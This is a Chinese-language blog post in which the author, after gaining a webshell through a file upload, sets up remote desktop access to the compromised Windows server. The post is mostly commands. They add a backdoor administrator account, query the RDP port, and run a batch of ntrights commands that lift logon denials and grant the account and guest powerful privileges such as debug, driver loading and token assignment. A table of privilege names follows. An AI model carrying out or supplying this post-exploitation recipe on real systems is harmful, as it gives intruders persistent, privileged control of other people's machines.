记一次远程桌面连接

起初是这样的,我们通过文件上传拿到一个webshell。添加用户
net user test test123!@# /add net localgroup administrators test /add

查询RDP端口

方法一

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
十六进制转为10进制即可

方法二

tasklist /svc | find "Ter"(查找远程连接的PID)
netstat -ano | find "1352"(通过PID值查找开放的端口)

尝试进行远程连接,嗯报错了…

莫西莫西,百度一番

ntrights

ntrights为命令行下的组策略管理命令。

ntrights.exe
用法:-u xxx xxx为用户/组
-m \\xxx 对远程主机进行操作(默认本地机器)
-e xxxxx 添加xxxxx到事件日志
-r xxx 删除xxx权限
+r xxx 添加xxx权限

解决办法:

ntrights -u test -r SeDenyInteractiveLogonRight
::去掉guest "拒绝本地登录" 权限
Ntrights -u test +r SeInteractiveLogonRight
::加上guest "允许本地登录" 权限
Ntrights -u test -r SeDenyNetworkLogonRight
::去掉guest "拒绝网络登录" 权限
Ntrights -u testt +r SeNetworkLogonRight
::加上guest "允许网络登录" 权限
Ntrights -u test +r SeRemoteInteractiveLogonRight

其实有时候只要最后一条就可以了。修改完成后,此错误消失了,但又产生了新的错误。

mmp,心想这不完蛋了,百度也搜不到方法。
最终我导出了所有的组策略,查看一番。

导出组策略

secedit /export /cfg 1.inf

下载1.inf即可。

解决办法:

把当前用的组策略改为和管理员一样
bat脚本

ntrights -u guest -r SeDenyInteractiveLogonRight
Ntrights -u guest +r SeInteractiveLogonRight
Ntrights -u guest -r SeDenyNetworkLogonRight
Ntrights -u guest +r SeNetworkLogonRight
Ntrights -u guest +r SeRemoteInteractiveLogonRight
Ntrights -u test +r SeBackupPrivilege
Ntrights -u test +r SeChangeNotifyPrivilege
Ntrights -u test +r SeSystemtimePrivilege
Ntrights -u test +r SeDebugPrivilege
Ntrights -u test +r SeRemoteShutdownPrivilege
Ntrights -u test +r SeIncreaseQuotaPrivilege
Ntrights -u test +r SeIncreaseBasePriorityPrivilege
Ntrights -u test +r SeLoadDriverPrivilege
Ntrights -u test +r SeBatchLogonRight
Ntrights -u test +r SeSecurityPrivilege
Ntrights -u test +r SeSystemEnvironmentPrivilege
Ntrights -u test +r SeProfileSingleProcessPrivilege
Ntrights -u test +r SeSystemProfilePrivilege
Ntrights -u test +r SeAssignPrimaryTokenPrivilege
Ntrights -u test +r SeRestorePrivilege
Ntrights -u test +r SeShutdownPrivilege
Ntrights -u test +r SeTakeOwnershipPrivilege
Ntrights -u test +r SeUndockPrivilege
Ntrights -u test +r SeManageVolumePrivilege
Ntrights -u test +r SeRemoteInteractiveLogonRight
Ntrights -u test +r SeCreateGlobalPrivilege
Ntrights -u test +r SeTimeZonePrivilege
Ntrights -u test +r SeCreateSymbolicLinkPrivilege
Ntrights -u test +r SeDelegateSessionUserImpersonatePrivilege
Ntrights -u test +r SeRemoteInteractiveLogonRight

组策略对应说明

用户权限 说明
SeCreateTokenPrivilege 创建记号对象
SeAssignPrimaryTokenPrivilege 替换进程级记号
SeLockMemoryPrivilege 内存中锁定页
SeIncreaseQuotaPrivilege 调整进程的内存配额
SeUnsolicitedInputPrivilege 不请自来的输入权限(不知此权限与用户权利指派中哪项对应)
SeMachineAccountPrivilege 域中添加工作站
SeTcbPrivilege 以操作系统方式操作
SeSecurityPrivilege 管理审核和安全日志
SeTakeOwnershipPrivilege 取得文件或其他对象的所有权
SeLoadDriverPrivilege 加载和卸载设备驱动程序
SeSystemProfilePrivilege 配置系统性能
SeSystemTimePrivilege 更改系统时间
SeProfileSingleProcessPrivilege 配置单一进程
SeIncreaseBasePriorityPrivilege 增加进度优先级
SeCreatePagefilePrivilege 创建页面文件
SeCreatePermanentPrivilege 创建永久共享对象
SeBackupPrivilege 备份文件和目录
SeRestorePrivilege 还原文件和目录
SeShutdownPrivilege 关闭系统
SeAuditPrivilege 产生安全审核
SeSystemEnvironmentPrivilege 修改系统(固件)环境值
SeChangeNotifyPrivilege 跳过遍历检查
点赞

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注